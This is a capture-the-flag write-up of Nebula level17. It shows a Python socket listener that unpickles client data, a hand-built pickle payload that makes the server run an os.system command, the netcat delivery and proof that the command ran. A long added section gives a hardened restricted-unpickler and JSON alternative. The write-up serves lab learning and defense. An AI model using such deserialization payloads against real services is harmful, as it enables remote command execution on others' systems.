Level17 dictates, “There is a python script listening on port 10007 that contains a vulnerability.”
Python! Nice. The nebula war game is using a variety of languages, which is fantastic. We are provided with the following source code:
#!/usr/bin/python
import os
import pickle
import time
import socket
import signal

# Reap forked children automatically so finished handlers never become zombies.
signal.signal(signal.SIGCHLD, signal.SIG_IGN)

def server(skt):
    # Read one message from the client and unpickle it directly.
    # This is the vulnerability: pickle resolves and calls whatever
    # callable the client's data names during deserialization.
    line = skt.recv(1024)
    obj = pickle.loads(line)

    for i in obj:
        # Note: replies go through the module-level clnt rather than the skt
        # parameter; this only works because the forked child inherits clnt.
        clnt.send("why did you send me " + i + "?\n")

skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.bind(('0.0.0.0', 10007))
skt.listen(10)

while True:
    clnt, addr = skt.accept()
    if(os.fork() == 0):
        clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
        server(clnt)
        exit(1)
I won’t spoil it, but I learned about pickle over at pythonchallenge.com. Do some additional research if you are not familiar with it.
The majority of the information on pickle will present you with this warning:
Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Never trust the user :)
Let’s craft some malicious data:
level17@nebula:~$ cat foo
cos
system
(S'getflag > /home/flag17/output'
tR.
This data, when deserialized, instructs the system to run ‘getflag > /home/flag17/output’. Let’s direct it at the listener using netcat.
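For contrast, here is an added example (my own, written in Python 3; it is not part of this write-up or of the Nebula source) of how the listener's handler could have been written so that this kind of data is rejected before anything runs. The names handle_message, handle_message_json, restricted_loads and the two constructed sample messages are assumptions for the example. It follows the approach from the Python docs of subclassing Unpickler and refusing every global lookup, validates that the result really is a list of strings, and shows a JSON-based handler as the simpler alternative; the hostile sample uses the same opcode sequence as the level's payload but names the harmless os.getcwd so the difference between the two loaders is visible without side effects.

```python
import io
import json
import os
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global name.

    A code-execution pickle names a callable with the GLOBAL opcode ('c')
    and then invokes it with REDUCE ('R'). Every GLOBAL lookup goes through
    find_class(), so raising here means plain data (strings, ints, lists,
    dicts, tuples) still loads but no module attribute can ever be reached.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(data):
    """Deserialize untrusted bytes with global lookups disabled."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def build_replies(obj):
    """Validate the decoded object and build the server's reply lines.

    Returns None unless the object is a list of strings, the only shape the
    level17 handler actually expects (it concatenates each element into a str).
    """
    if not isinstance(obj, list) or not all(isinstance(i, str) for i in obj):
        return None
    return ["why did you send me %s?" % i for i in obj]


def handle_message(data):
    """Hardened replacement for the server() body: returns reply lines or None."""
    try:
        obj = restricted_loads(data)
    except Exception:  # malformed input or a forbidden global; reject either way
        return None
    return build_replies(obj)


def handle_message_json(data):
    """Safer still: use JSON, which has no notion of callables at all."""
    try:
        obj = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None
    return build_replies(obj)


# Constructed sample inputs (assumed for this example, not taken from the game).
BENIGN_MESSAGE = pickle.dumps(["apple", "pear"], protocol=0)

# Same opcode sequence as the level's payload (GLOBAL, MARK, TUPLE, REDUCE,
# STOP) but naming the side-effect-free os.getcwd instead of os.system.
HOSTILE_MESSAGE = b"cos\ngetcwd\n(tR."


def unrestricted_load_executes(data):
    """Show what plain pickle.loads() does with the hostile bytes: it calls
    the named function during deserialization and returns its result."""
    return pickle.loads(data) == os.getcwd()


if __name__ == "__main__":
    print("benign  :", handle_message(BENIGN_MESSAGE))
    print("hostile :", handle_message(HOSTILE_MESSAGE))
    print("pickle.loads() called os.getcwd():",
          unrestricted_load_executes(HOSTILE_MESSAGE))
    print("json    :", handle_message_json(b'["apple", "pear"]'))
```

The restricted unpickler is a mitigation for code that cannot move off pickle; the JSON handler is the real fix, since a wire format with no callable type removes the bug class instead of filtering it.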
level17@nebula:~$ nc localhost 10007 < foo
Accepted connection from 127.0.0.1:44614^C
level17@nebula:~$ cat /home/flag17/output
You have successfully executed getflag on a target account
Woo, on to the next level!